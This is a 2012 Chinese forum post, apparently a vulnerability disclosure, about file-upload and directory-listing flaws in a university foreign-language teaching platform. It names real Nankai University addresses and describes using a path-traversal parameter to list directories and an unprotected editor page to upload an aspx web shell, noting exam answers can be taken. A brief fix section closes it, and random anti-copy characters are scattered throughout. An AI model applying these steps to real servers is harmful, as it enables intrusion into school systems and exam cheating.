找回密码
 立即注册
查看: 2890|回复: 0
打印 上一主题 下一主题

新理念外语网络教学平台文件上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-4 11:10:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中
& P1 ?% O8 w9 f, v7 {; I. q9 E5 h- `! H3 O% `/ y1 q! i( \& j
详细说明:
5 M8 I; k3 ~) w ' K$ S" X1 S- m
以南开大学的为例: " b7 A7 j4 i# N' M- g
http://222.30.60.3/NPELS5 J+ l1 k1 v4 V# G+ U$ _
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址! t' H: i6 g% v  u; Q! _9 M+ r
<setting name="Update_CommonSvr_CommonService" serializeAs="String">. p1 O) e6 U& X3 U- X
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>8 g$ N% M7 {  \! ]( M
</setting>
3 b$ _# c8 n: N$ E0 i4 U- H及版本号1 }9 Y. r+ W% E6 H. u
<add key="TVersion" value="1, 0, 0, 2187">
- i5 S, [3 _. w0 I: B; C</add>
4 u# L  ~# j, D, X. W& q* z直接访问
0 p. U9 o, i: S, D) ^1 Shttp://222.30.60.3/NPELS/CommonService.asmx
! r8 G. ^4 d4 Y1 C, y. ]( {5 d使用GetTestClientFileList操作,直接 HTTP GET 列目录:" S3 I$ |( d, n" ^; i' X3 H
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187! @$ g0 R/ X  f! c% \' o
进一步列目录(返回的网页很大,可以直接 wget 下来)& \1 z7 K" A, {: G
http://222.30.60.3/NPELS/CommonS ... List?version=../../. ]# f- U8 i3 T; d
, d9 C2 B! h' R6 k, y
发现8 p# K7 v8 c4 c# ], j* `9 ~) \
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
5 K$ s$ w4 _# x' x6 A可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头6 |6 l* j+ X9 U: e8 l- }9 [( c) P& ]. G1 G
上传后继续列目录找到木马地址直接访问即可
: o1 |1 O  b8 t( y) \% s, \, O3 v " k8 ~" z2 Z! a% o, p; X
OOXX, ]" L( u1 j: g$ K
: L8 A4 ?8 ^% O
Google "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法3 n, }  ~4 o) U6 n
漏洞证明:, N% z" y/ O- F  }, D4 b6 I$ ?
- h8 u4 ?3 B/ D: H
列目录:3 c7 Q2 c9 U% ^& ^, ^; R$ _( \
http://222.30.60.3/NPELS/CommonS ... List?version=../../# L$ t% o( A4 J- x* x' |
文件上传:
7 Z& i$ n% M7 U' q3 a& Ihttp://222.30.60.3/npelsv/editor/editor.htm
2 R8 e. u# ?  f7 p/ p % D8 q+ E; B: I% J0 @# `  d
上传木马:
, n5 S  `1 N; q& f6 X+ ]- ghttp://222.30.60.3/npelsv/editor/uploadfiles/1.aspx, K2 m) P" g3 u! Q
# c% `# P% h* V$ z% a# S2 W; ^9 L- o8 t2 k
修复方案:+ E- }# Q7 ~2 m. E( D# D
好像考试系统必须使用 CommonService.asmx
$ P$ D5 w6 y( Q7 G最好配置文件加密或者用别的方式不让它泄露出来# o3 m$ j- |7 K/ X
并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样​. A5 V" l4 ?+ n
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表